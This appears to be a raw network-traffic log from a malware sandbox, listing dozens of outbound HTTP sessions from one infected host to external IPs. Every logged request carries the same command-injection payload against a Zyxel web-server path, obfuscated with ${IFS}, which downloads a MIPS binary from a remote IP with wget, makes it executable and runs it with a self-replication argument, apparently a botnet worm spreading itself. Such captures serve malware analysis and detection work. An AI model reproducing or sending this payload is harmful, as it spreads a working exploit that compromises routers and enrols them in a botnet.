                                                  Jan 19, 2024 18:23:41.751418114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  874192.168.2.134091657.241.96.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751451015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  875192.168.2.1359304153.104.20.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751481056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  876192.168.2.1349524199.54.192.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751530886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  877192.168.2.1341532123.67.182.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751569986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  878192.168.2.133663650.248.181.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751590967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  879192.168.2.13594109.237.131.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751645088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  880192.168.2.134946213.158.155.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751692057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  881192.168.2.134709213.188.244.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751718998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  882192.168.2.136063857.22.246.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751750946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  883192.168.2.1351646193.165.221.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751785040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  884192.168.2.134964837.31.157.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751828909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  885192.168.2.1347616105.207.6.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751869917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  886192.168.2.1359146198.231.172.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751902103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  887192.168.2.1340452143.11.117.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751951933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  888192.168.2.135379831.116.2.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.751974106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  889192.168.2.13488108.120.121.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752005100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  890192.168.2.135023892.84.19.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752053022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  891192.168.2.1340618201.98.38.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752094984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  892192.168.2.135481694.147.223.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752134085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  893192.168.2.1350098179.176.36.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752172947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  894192.168.2.134690854.241.41.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752213001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  895192.168.2.13485629.201.78.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752242088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  896192.168.2.1357144195.155.140.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752275944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  897192.168.2.1360622217.37.209.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752322912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  898192.168.2.1337898196.230.45.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752355099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  899192.168.2.1360598165.116.23.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752401114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  900192.168.2.134783072.116.204.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752432108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  901192.168.2.134388250.87.236.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752469063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  902192.168.2.134244667.232.231.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752541065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  903192.168.2.1342256221.218.179.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752563953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  904192.168.2.1354858162.251.146.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752605915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  905192.168.2.135065832.165.36.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752638102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  906192.168.2.1359568150.40.123.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752662897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  907192.168.2.135240265.94.155.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752710104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  908192.168.2.134428282.95.151.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752767086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  909192.168.2.1347030133.59.211.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752795935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  910192.168.2.1338896177.17.218.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752841949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  911192.168.2.1355994185.227.189.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752887964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  912192.168.2.135375272.153.129.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752931118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  913192.168.2.1345062117.70.220.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.752955914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  914192.168.2.1350040142.32.18.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753012896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  915192.168.2.133789079.32.223.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753032923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  916192.168.2.1351946112.77.228.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753068924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  917192.168.2.134792071.192.62.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753083944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  918192.168.2.135489492.231.181.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753143072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  919192.168.2.134508443.204.7.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753185034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  920192.168.2.1350054192.130.83.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753216982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  921192.168.2.1350804126.231.16.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753259897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  922192.168.2.1337512143.139.77.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753298044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  923192.168.2.135258053.59.197.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753319025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  924192.168.2.1345382147.241.200.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753381968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  925192.168.2.1336328140.225.230.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753423929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  926192.168.2.1333630183.117.2.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753453016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  927192.168.2.1333282104.13.25.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753484011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  928192.168.2.135806243.216.193.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753530025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  929192.168.2.1342546182.54.16.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753551006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  930192.168.2.135699212.155.230.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753597975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  931192.168.2.1360986147.58.215.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753632069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  932192.168.2.135279675.53.23.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753683090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  933192.168.2.1350064139.196.155.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753730059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  934192.168.2.135237835.212.176.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753771067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  935192.168.2.135790699.49.19.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:41.753810883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  936192.168.2.1335068101.161.174.25443
                                                  TimestampBytes transferredDirectionData
